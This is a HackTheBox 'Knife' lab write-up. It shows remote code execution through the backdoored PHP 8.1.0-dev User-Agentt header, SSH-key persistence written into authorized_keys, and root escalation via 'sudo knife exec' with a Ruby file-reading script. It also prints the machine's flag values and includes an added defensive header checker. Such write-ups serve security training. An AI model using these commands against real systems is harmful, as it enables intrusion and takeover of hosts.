HackTheBox - Knife


Summary

Knife
Difficulty: Easy
OS: Linux
Release date: 22-05-2021

Knife was an easy and straightforward machine which involved exploiting a backdoor in PHP to gain user access. Root access was achieved by escalating privileges through the Knife command-line tool.

Foothold

An Nmap scan revealed that ports on this machine are 22 and 80, and that there was a webserver running on port 80.

mick@kali:~/Documents/HackTheBox/Knife$ nmap -sV -sC -oN nmap_knife 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 22:31 CEST
Nmap scan report for 10.10.10.242
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.46 seconds

The web application was a static medical website that did not lead anywhere.

[Screenshot: knife_homepage, the static medical website]

After looking around and inspecting the network requests upon loading the homepage, I discovered that this web application disclosed the PHP version in the response headers.

[Screenshot: knife_network, the response headers disclosing the PHP version]

To be specific, the PHP version in use was 8.1.0-dev. A quick Google search revealed that this version contained a backdoor that allowed RCE by sending commands in the ‘User-Agentt’ header. A quick test showed that the exploit worked and that the user running the web application was ‘james’.

mick@kali:~/Documents/HackTheBox/Knife$ python3 exploit.py -u http://10.10.10.242 -c "whoami"
[+] Results:
james
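The version disclosure above is the detectable part of this finding from the defender's side. The following Python checker is an added example, not part of the original writeup: it parses a raw HTTP response head, extracts the PHP version from X-Powered-By, and flags the backdoored 8.1.0-dev build. The sample response is constructed to mirror the headers described in the writeup.

```python
import re
from typing import Dict, Optional

# The development build that shipped with the backdoor, as named in the writeup.
BACKDOORED_PHP_VERSION = "8.1.0-dev"


def parse_http_headers(raw_response: str) -> Dict[str, str]:
    """Parse the head of a raw HTTP/1.x response into a lower-cased header dict."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def php_version_from_headers(headers: Dict[str, str]) -> Optional[str]:
    """Return the PHP version disclosed via X-Powered-By, or None if absent."""
    match = re.search(r"PHP/([0-9][0-9A-Za-z.\-]*)", headers.get("x-powered-by", ""))
    return match.group(1) if match else None


def assess_php_disclosure(raw_response: str) -> dict:
    """Report whether the server leaks its PHP version and whether it is the backdoored build."""
    version = php_version_from_headers(parse_http_headers(raw_response))
    return {
        "php_version": version,
        "discloses_version": version is not None,
        "backdoored_build": version == BACKDOORED_PHP_VERSION,
    }


# Constructed sample modelled on the headers the writeup describes (not a real capture).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    print(assess_php_disclosure(SAMPLE_RESPONSE))
```

A server with expose_php turned off will not send X-Powered-By at all, so a missing header means the check is inconclusive rather than that the build is safe.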

To make this a little easier to work with, I decided to append my SSH public key to james's authorized_keys file.

mick@kali:~/Documents/HackTheBox/Knife$ python3 exploit.py -u http://10.10.10.242 -c "echo ssh-rsa AAAA<snip>008= >> /home/james/.ssh/authorized_keys"

After doing so, I managed to gain foothold and user access.

mick@kali:~/Documents/HackTheBox/Knife$ ssh james@10.10.10.242
Enter passphrase for key '/home/mick/.ssh/id_rsa': 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-72-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 13 Jul 2021 09:34:21 PM UTC

  System load:             0.07
  Usage of /:              51.7% of 9.72GB
  Memory usage:            66%
  Swap usage:              0%
  Processes:               356
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.242
  IPv6 address for ens160: dead:beef::250:56ff:feb9:64a3


18 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jul 13 17:15:33 2021 from 10.10.16.14
-bash-5.0$ cat user.txt
3f0ff5728469b357dbf8b7eb67e19dca

Root access

After checking which binaries I could run with sudo, I discovered that I had access to knife. Knife is a command-line utility that helps manage Chef environments.

-bash-5.0$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The most interesting thing about this finding was that knife has an exec subcommand that runs arbitrary Ruby scripts. To escalate my privileges I quickly put together a Ruby script called ‘exploit.rb’ with the code below. The script reads and prints the content of the root.txt file. Instead of reading root.txt I could also have read root’s private SSH key to gain full root access to the machine.

# Runs as root via "sudo knife exec", so any file on the box is readable here.
# Path as used in the original writeup.
file = File.open("/home/root/root.txt")
file_data = file.read
puts file_data
file.close

Exploiting this provided me with root access.

-bash-5.0$ sudo knife exec exploit.rb
84d80cc163b0cfe0bfe4253aa9c9421a